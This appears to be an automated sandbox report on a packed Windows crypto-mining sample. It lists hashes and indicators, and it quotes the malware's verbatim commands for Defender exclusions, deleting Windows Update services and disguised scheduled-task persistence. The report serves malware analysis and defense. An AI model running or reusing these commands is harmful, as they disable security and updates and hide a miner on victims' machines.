Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
299s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
03/12/2022, 23:32
Behavioral task
behavioral1
Sample
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Resource
win7-20220901-en
General
-
Target
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
-
Size
6.7MB
-
MD5
57bc38aa4830968ccfd83ddf9417c93f
-
SHA1
31b3dc9a13f1a9fffc2eeb272494bf60fc385338
-
SHA256
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
-
SHA512
26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7
-
SSDEEP
196608:2rL58hRFrt1wspQDI9mW4VQ7JEuyHzqFMZMCO:6E3J6spIMmW73JMZMCO
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 1300 created 1212 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 14 PID 1300 created 1212 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 14 PID 1300 created 1212 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 14 PID 1300 created 1212 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 14 PID 1300 created 1212 1300 Process not Found 14 PID 2008 created 1212 2008 updater.exe 14 PID 2008 created 1212 2008 updater.exe 14 PID 2008 created 1212 2008 updater.exe 14 PID 2008 created 1212 2008 updater.exe 14 PID 2008 created 1212 2008 updater.exe 14 PID 1804 created 1212 1804 conhost.exe 14 PID 2008 created 1212 2008 updater.exe 14 PID 2008 created 1212 2008 updater.exe 14 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/760-146-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/760-147-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
pid Process 2008 updater.exe -
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral1/memory/760-146-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/760-147-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Loads dropped DLL 1 IoCs
pid Process 1448 taskeng.exe -
resource yara_rule behavioral1/memory/1300-54-0x000000013F260000-0x000000013FE9D000-memory.dmp themida behavioral1/memory/1300-55-0x000000013F260000-0x000000013FE9D000-memory.dmp themida behavioral1/memory/1300-56-0x000000013F260000-0x000000013FE9D000-memory.dmp themida behavioral1/memory/1300-57-0x000000013F260000-0x000000013FE9D000-memory.dmp themida behavioral1/memory/1300-58-0x000000013F260000-0x000000013FE9D000-memory.dmp themida behavioral1/memory/1300-66-0x000000013F260000-0x000000013FE9D000-memory.dmp themida behavioral1/memory/1300-93-0x000000013F260000-0x000000013FE9D000-memory.dmp themida behavioral1/files/0x000c0000000122f3-99.dat themida behavioral1/files/0x000c0000000122f3-101.dat themida behavioral1/memory/2008-102-0x000000013FD90000-0x00000001409CD000-memory.dmp themida behavioral1/memory/2008-103-0x000000013FD90000-0x00000001409CD000-memory.dmp themida behavioral1/memory/2008-104-0x000000013FD90000-0x00000001409CD000-memory.dmp themida behavioral1/memory/2008-105-0x000000013FD90000-0x00000001409CD000-memory.dmp themida behavioral1/memory/2008-107-0x000000013FD90000-0x00000001409CD000-memory.dmp themida behavioral1/memory/2008-137-0x000000013FD90000-0x00000001409CD000-memory.dmp themida behavioral1/files/0x000c0000000122f3-140.dat themida behavioral1/memory/2008-144-0x000000013FD90000-0x00000001409CD000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk cmd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Process not Found File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 2008 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2008 set thread context of 1804 2008 updater.exe 82 PID 2008 set thread context of 760 2008 updater.exe 85 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe Process not Found File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1992 sc.exe 288 sc.exe 592 sc.exe 1676 sc.exe 1264 sc.exe 968 sc.exe 1424 sc.exe 524 sc.exe 1736 sc.exe 984 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2036 schtasks.exe 888 schtasks.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e09c9aaa6f07d901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 932 powershell.exe 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 1300 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 1996 cmd.exe 1300 Process not Found 1300 Process not Found 1868 Process not Found 2008 updater.exe 2008 updater.exe 672 powershell.exe 2008 updater.exe 2008 updater.exe 2008 updater.exe 2008 updater.exe 2008 updater.exe 2008 updater.exe 1092 powershell.exe 2008 updater.exe 2008 updater.exe 1804 conhost.exe 1804 conhost.exe 2008 updater.exe 2008 updater.exe 2008 updater.exe 2008 updater.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe 760 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 932 powershell.exe Token: SeShutdownPrivilege 276 powercfg.exe Token: SeShutdownPrivilege 2032 powercfg.exe Token: SeShutdownPrivilege 984 sc.exe Token: SeDebugPrivilege 1996 cmd.exe Token: SeShutdownPrivilege 1332 powercfg.exe Token: SeDebugPrivilege 1868 Process not Found Token: SeDebugPrivilege 672 powershell.exe Token: SeShutdownPrivilege 1376 powercfg.exe Token: SeShutdownPrivilege 1732 powercfg.exe Token: SeShutdownPrivilege 1520 powercfg.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeShutdownPrivilege 1928 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1360 WMIC.exe Token: SeIncreaseQuotaPrivilege 1360 WMIC.exe Token: SeSecurityPrivilege 1360 WMIC.exe Token: SeTakeOwnershipPrivilege 1360 WMIC.exe Token: SeLoadDriverPrivilege 1360 WMIC.exe Token: SeSystemtimePrivilege 1360 WMIC.exe Token: SeBackupPrivilege 1360 WMIC.exe Token: SeRestorePrivilege 1360 WMIC.exe Token: SeShutdownPrivilege 1360 WMIC.exe Token: SeSystemEnvironmentPrivilege 1360 WMIC.exe Token: SeUndockPrivilege 1360 WMIC.exe Token: SeManageVolumePrivilege 1360 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1360 WMIC.exe Token: SeIncreaseQuotaPrivilege 1360 WMIC.exe Token: SeSecurityPrivilege 1360 WMIC.exe Token: SeTakeOwnershipPrivilege 1360 WMIC.exe Token: SeLoadDriverPrivilege 1360 WMIC.exe Token: SeSystemtimePrivilege 1360 WMIC.exe Token: SeBackupPrivilege 1360 WMIC.exe Token: SeRestorePrivilege 1360 WMIC.exe Token: SeShutdownPrivilege 1360 WMIC.exe Token: SeSystemEnvironmentPrivilege 1360 WMIC.exe Token: SeUndockPrivilege 1360 WMIC.exe Token: SeManageVolumePrivilege 1360 WMIC.exe Token: SeLockMemoryPrivilege 760 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1556 wrote to memory of 276 1556 cmd.exe 32 PID 1556 wrote to memory of 276 1556 cmd.exe 32 PID 1556 wrote to memory of 276 1556 cmd.exe 32 PID 1556 wrote to memory of 2032 1556 cmd.exe 36 PID 1556 wrote to memory of 2032 1556 cmd.exe 36 PID 1556 wrote to memory of 2032 1556 cmd.exe 36 PID 1140 wrote to memory of 968 1140 cmd.exe 40 PID 1140 wrote to memory of 968 1140 cmd.exe 40 PID 1140 wrote to memory of 968 1140 cmd.exe 40 PID 1556 wrote to memory of 984 1556 cmd.exe 75 PID 1556 wrote to memory of 984 1556 cmd.exe 75 PID 1556 wrote to memory of 984 1556 cmd.exe 75 PID 1140 wrote to memory of 1992 1140 cmd.exe 39 PID 1140 wrote to memory of 1992 1140 cmd.exe 39 PID 1140 wrote to memory of 1992 1140 cmd.exe 39 PID 1556 wrote to memory of 1332 1556 cmd.exe 38 PID 1556 wrote to memory of 1332 1556 cmd.exe 38 PID 1556 wrote to memory of 1332 1556 cmd.exe 38 PID 1140 wrote to memory of 288 1140 cmd.exe 41 PID 1140 wrote to memory of 288 1140 cmd.exe 41 PID 1140 wrote to memory of 288 1140 cmd.exe 41 PID 1140 wrote to memory of 1424 1140 cmd.exe 42 PID 1140 wrote to memory of 1424 1140 cmd.exe 42 PID 1140 wrote to memory of 1424 1140 cmd.exe 42 PID 1140 wrote to memory of 592 1140 cmd.exe 43 PID 1140 wrote to memory of 592 1140 cmd.exe 43 PID 1140 wrote to memory of 592 1140 cmd.exe 43 PID 1140 wrote to memory of 780 1140 cmd.exe 44 PID 1140 wrote to memory of 780 1140 cmd.exe 44 PID 1140 wrote to memory of 780 1140 cmd.exe 44 PID 1996 wrote to memory of 2036 1996 cmd.exe 49 PID 1996 wrote to memory of 2036 1996 cmd.exe 49 PID 1996 wrote to memory of 2036 1996 cmd.exe 49 PID 1140 wrote to memory of 1880 1140 cmd.exe 48 PID 1140 wrote to memory of 1880 1140 cmd.exe 48 PID 1140 wrote to memory of 1880 1140 cmd.exe 48 PID 1140 wrote to memory of 924 1140 cmd.exe 46 PID 1140 wrote to memory of 924 1140 cmd.exe 46 PID 1140 wrote to memory of 924 1140 cmd.exe 46 PID 1140 wrote to memory of 1184 1140 cmd.exe 45 PID 1140 wrote to memory of 1184 1140 cmd.exe 45 PID 1140 wrote to memory of 1184 1140 cmd.exe 45 PID 1140 wrote to memory of 1688 1140 cmd.exe 47 PID 1140 wrote to memory of 1688 1140 cmd.exe 47 PID 1140 wrote to memory of 1688 1140 cmd.exe 47 PID 1868 wrote to memory of 296 1868 Process not Found 52 PID 1868 wrote to memory of 296 1868 Process not Found 52 PID 1868 wrote to memory of 296 1868 Process not Found 52 PID 1448 wrote to memory of 2008 1448 taskeng.exe 54 PID 1448 wrote to memory of 2008 1448 taskeng.exe 54 PID 1448 wrote to memory of 2008 1448 taskeng.exe 54 PID 1708 wrote to memory of 984 1708 cmd.exe 75 PID 1708 wrote to memory of 984 1708 cmd.exe 75 PID 1708 wrote to memory of 984 1708 cmd.exe 75 PID 1476 wrote to memory of 1376 1476 cmd.exe 61 PID 1476 wrote to memory of 1376 1476 cmd.exe 61 PID 1476 wrote to memory of 1376 1476 cmd.exe 61 PID 1708 wrote to memory of 1264 1708 cmd.exe 74 PID 1708 wrote to memory of 1264 1708 cmd.exe 74 PID 1708 wrote to memory of 1264 1708 cmd.exe 74 PID 1476 wrote to memory of 1732 1476 cmd.exe 62 PID 1476 wrote to memory of 1732 1476 cmd.exe 62 PID 1476 wrote to memory of 1732 1476 cmd.exe 62 PID 1708 wrote to memory of 1736 1708 cmd.exe 73
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe"C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:984
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1992
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:968
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:288
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1424
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:592
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:780
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1184
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:924
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1688
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1880
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵PID:1996
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zneglfoyv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵PID:1868
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:296
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:888
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1476
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1708
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1556
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe kfleahquehi2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1804
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qjosysdnolwwzbsc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqwn6vckAqS7SwZBHmWfSXaoYPV5nF5hTjq2epH65KwNo9lXjxaX7KyBDQ9wTlDmUyUC+oUs02ckKl1ssjG3/geDSTbyqoDAGDRxVlNzsfIHK9jTKb41kkt5n5KU3N0Quo/PGA9zlisO7lVe8SE+rkGyntU1fmaH3axIruRYdl/jwpgiyjxwLGtc6v6EqhF8Y//wqc4DLjxoML3CNLKlunEmrYb4h2eim5E/v5ur7MeJhAgSNi+g/oyV2b3B6L2NmJWK44j/1PmtzJdtTTjUwWRqlta/ahTq/+dpQPXgFJnSzXSrMxkKo/DX1UjiEO6EZkutvT8vEDAT5kxHv9ZLCKlKkJ3uqdAFqloYaVbbwogLJFee/cR8Mos6dW3oZ4LvaMe4O0ga8CszjkHqad5ywliajU1jFFEA4in7m8Y2aWveg=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2A33E26E-AF3A-40C1-A138-C7B6D243590F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2008
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
C:\Windows\System32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:524
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f1⤵PID:1816
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f1⤵PID:1724
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f1⤵PID:1180
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵PID:1728
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f1⤵PID:1452
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
C:\Windows\System32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:1676
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
C:\Windows\System32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:1736
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:1264
-
C:\Windows\System32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:984
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.7MB
MD557bc38aa4830968ccfd83ddf9417c93f
SHA131b3dc9a13f1a9fffc2eeb272494bf60fc385338
SHA256f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
SHA51226f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7
-
Filesize
6.7MB
MD557bc38aa4830968ccfd83ddf9417c93f
SHA131b3dc9a13f1a9fffc2eeb272494bf60fc385338
SHA256f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
